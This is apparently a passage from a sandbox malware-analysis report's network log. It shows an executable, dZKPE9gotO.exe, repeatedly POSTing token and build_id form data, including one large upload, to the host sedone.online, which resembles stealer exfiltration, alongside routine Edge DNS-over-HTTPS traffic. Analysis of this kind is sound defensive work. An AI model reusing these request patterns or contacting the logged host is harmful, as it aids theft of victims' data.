                                                                                                                                                                                                                                                2024-12-16 14:39:59 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:39:59 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:39:59 UTC11617OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:40:01 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:00 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-16 14:40:01 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                15192.168.2.749785116.203.12.1144432000C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:40:00 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----BS2D2V3W4EUAAIWBIWT2
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 493
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-16 14:40:00 UTC493OUTData Raw: 2d 2d 2d 2d 2d 2d 42 53 32 44 32 56 33 57 34 45 55 41 41 49 57 42 49 57 54 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 61 66 61 30 62 64 33 34 33 61 64 31 39 66 39 32 30 30 61 31 38 31 66 61 38 33 34 38 39 61 61 0d 0a 2d 2d 2d 2d 2d 2d 42 53 32 44 32 56 33 57 34 45 55 41 41 49 57 42 49 57 54 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 42 53 32 44 32 56 33 57 34 45 55 41 41 49 57 42 49 57 54 32 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------BS2D2V3W4EUAAIWBIWT2Content-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------BS2D2V3W4EUAAIWBIWT2Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------BS2D2V3W4EUAAIWBIWT2Cont
                                                                                                                                                                                                                                                2024-12-16 14:40:01 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:01 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-16 14:40:01 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                16192.168.2.749815116.203.12.1144432000C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:40:07 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----6XBI5FCBIEUAIEK6PPPP
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 3165
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-16 14:40:07 UTC3165OUTData Raw: 2d 2d 2d 2d 2d 2d 36 58 42 49 35 46 43 42 49 45 55 41 49 45 4b 36 50 50 50 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 61 66 61 30 62 64 33 34 33 61 64 31 39 66 39 32 30 30 61 31 38 31 66 61 38 33 34 38 39 61 61 0d 0a 2d 2d 2d 2d 2d 2d 36 58 42 49 35 46 43 42 49 45 55 41 49 45 4b 36 50 50 50 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 36 58 42 49 35 46 43 42 49 45 55 41 49 45 4b 36 50 50 50 50 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------6XBI5FCBIEUAIEK6PPPPContent-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------6XBI5FCBIEUAIEK6PPPPContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------6XBI5FCBIEUAIEK6PPPPCont
                                                                                                                                                                                                                                                2024-12-16 14:40:08 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:08 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-16 14:40:08 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                17192.168.2.749831162.159.61.34435088C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:40:08 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Content-Length: 128
                                                                                                                                                                                                                                                Accept: application/dns-message
                                                                                                                                                                                                                                                Accept-Language: *
                                                                                                                                                                                                                                                User-Agent: Chrome
                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                                                2024-12-16 14:40:08 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                2024-12-16 14:40:08 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:08 GMT
                                                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                Content-Length: 468
                                                                                                                                                                                                                                                CF-RAY: 8f2f6d467c6843fb-EWR
                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                2024-12-16 14:40:08 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 24 00 04 8e fa 41 e3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                Data Ascii: wwwgstaticcom$A)


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                18192.168.2.749836162.159.61.34435088C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:40:08 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Content-Length: 128
                                                                                                                                                                                                                                                Accept: application/dns-message
                                                                                                                                                                                                                                                Accept-Language: *
                                                                                                                                                                                                                                                User-Agent: Chrome
                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                                                2024-12-16 14:40:08 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                2024-12-16 14:40:08 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:08 GMT
                                                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                Content-Length: 468
                                                                                                                                                                                                                                                CF-RAY: 8f2f6d467c2241e1-EWR
                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                2024-12-16 14:40:08 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1c 00 04 8e fb 28 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                Data Ascii: wwwgstaticcom(c)


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                19192.168.2.749840172.64.41.34435088C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:40:08 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Content-Length: 128
                                                                                                                                                                                                                                                Accept: application/dns-message
                                                                                                                                                                                                                                                Accept-Language: *
                                                                                                                                                                                                                                                User-Agent: Chrome
                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                                                2024-12-16 14:40:08 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                2024-12-16 14:40:08 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:08 GMT
                                                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                Content-Length: 468
                                                                                                                                                                                                                                                CF-RAY: 8f2f6d468b8318c4-EWR
                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                2024-12-16 14:40:08 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1e 00 04 8e fb 28 e3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                Data Ascii: wwwgstaticcom()


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                20192.168.2.749825116.203.12.1144432000C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:40:08 UTC328OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----XTR9HLFK6F37YU3WT00H
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 207993
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-16 14:40:08 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 58 54 52 39 48 4c 46 4b 36 46 33 37 59 55 33 57 54 30 30 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 61 66 61 30 62 64 33 34 33 61 64 31 39 66 39 32 30 30 61 31 38 31 66 61 38 33 34 38 39 61 61 0d 0a 2d 2d 2d 2d 2d 2d 58 54 52 39 48 4c 46 4b 36 46 33 37 59 55 33 57 54 30 30 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 58 54 52 39 48 4c 46 4b 36 46 33 37 59 55 33 57 54 30 30 48 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------XTR9HLFK6F37YU3WT00HContent-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------XTR9HLFK6F37YU3WT00HContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------XTR9HLFK6F37YU3WT00HCont
                                                                                                                                                                                                                                                2024-12-16 14:40:08 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:40:08 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:40:08 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
